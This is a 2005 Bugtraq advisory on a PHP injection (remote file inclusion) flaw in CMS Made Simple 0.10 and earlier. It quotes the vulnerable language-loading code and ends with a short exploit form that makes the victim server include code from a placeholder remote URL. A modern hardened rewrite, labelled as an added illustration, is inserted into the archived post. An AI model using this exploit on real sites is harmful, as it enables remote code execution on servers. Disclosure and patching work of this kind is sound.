
List:       bugtraq
Subject:    CMS Made Simple <= 0.10 - PHP injection
From:       groszynskif () gmail ! com
Date:       2005-08-31 19:18:04
Message-ID: 20050831191804.11058.qmail () securityfocus ! com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: CMS Made Simple - PHP injection 
   Version <= 0.10
   Homepage: http://www.cmsmadesimple.org/

   Author: Filip Groszynski (VXSfx)
   Date: 31 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

   CMS Made Simple is an easy-to-use content management
   system for simple, stable content sites. It uses PHP, MySQL
   and the Smarty templating system.

   --------------------------------------------------------
   
   Vulnerable code exists in ./admin/lang.php (the lines marked [!] are the ones involved):

   <?php
	...
	$current_language = "en_US";
	#Only do language stuff for admin pages
[!]	if (isset($CMS_ADMIN_PAGE)) {
		...
		#Check to see if there is already a language in use...
		if (isset($_POST["change_cms_lang"])) {
[!]			$current_language = $_POST["change_cms_lang"];
			setcookie("cms_language", $_POST["change_cms_lang"]);
		} else if (isset($_COOKIE["cms_language"])) {
			$current_language = $_COOKIE["cms_language"];
		}
		else {
			...
		}

		#Ok, we have a language to load, let's load it already...
		if (isset($nls['file'][$current_language])) {
			foreach ($nls['file'][$current_language] as $onefile) {
[!]				include($onefile);
			}
		}
		...
	}
	...
   ?>
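   The problem in the excerpt is that $current_language comes straight from the POST body or a cookie without validation, and, as the exploit form below shows, $CMS_ADMIN_PAGE and the $nls table itself can be supplied in the query string when register_globals is on, so include() loads whatever path the request names. A hardened version of the same selection logic, added here as an illustration and not code from the CMS Made Simple project: the language table is built from a fixed directory rather than from request data, the requested code is checked against that allowlist, and every file must resolve inside the language directory before it is included. The directory layout (admin/lang/<code>/*.php) and the function names are assumptions.

```php
<?php
// Hardened language selection for admin/lang.php (illustrative; not the
// CMS Made Simple project's own code). Assumed layout: admin/lang/<code>/*.php.

define('LANG_DIR', realpath(__DIR__ . '/lang'));

// Build the allowlist from the filesystem, never from the request: with
// register_globals an attacker could otherwise hand us a $nls table whose
// "files" are remote URLs.
function available_languages(): array {
    $langs = [];
    foreach (glob(LANG_DIR . '/*', GLOB_ONLYDIR) ?: [] as $dir) {
        $code = basename($dir);
        // Accept only xx_YY codes; no dots, slashes or scheme prefixes.
        if (preg_match('/^[a-z]{2}_[A-Z]{2}$/', $code)) {
            $langs[$code] = glob($dir . '/*.php') ?: [];
        }
    }
    return $langs;
}

// POST wins over cookie, but only values present in the allowlist are
// honoured; anything else (including an array) falls back to the default.
function select_language(array $langs, string $default = 'en_US'): string {
    $candidate = $_POST['change_cms_lang'] ?? $_COOKIE['cms_language'] ?? $default;
    if (!is_string($candidate) || !isset($langs[$candidate])) {
        return $default;
    }
    if (isset($_POST['change_cms_lang'])) {
        setcookie('cms_language', $candidate, 0, '/', '', false, true); // HttpOnly
    }
    return $candidate;
}

// Include only files that resolve inside LANG_DIR: realpath() collapses ../
// and returns false for URLs, so neither remote nor traversal includes pass.
function load_language_files(array $files): int {
    $loaded = 0;
    foreach ($files as $file) {
        $real = realpath($file);
        if ($real !== false && strpos($real, LANG_DIR . DIRECTORY_SEPARATOR) === 0) {
            include $real;
            $loaded++;
        }
    }
    return $loaded;
}

$nls = available_languages();            // replaces the global $nls from the page
$current_language = select_language($nls);
load_language_files($nls[$current_language] ?? []);
```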
   --------------------------------------------------------

   Exploit:

	example.html:
	  <form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
	  <input type=hidden name=change_cms_lang value=vx>
	  <input type=submit name=test VALUE="do it">
	  </form>
	EOF

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif <|> gmail <|> com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
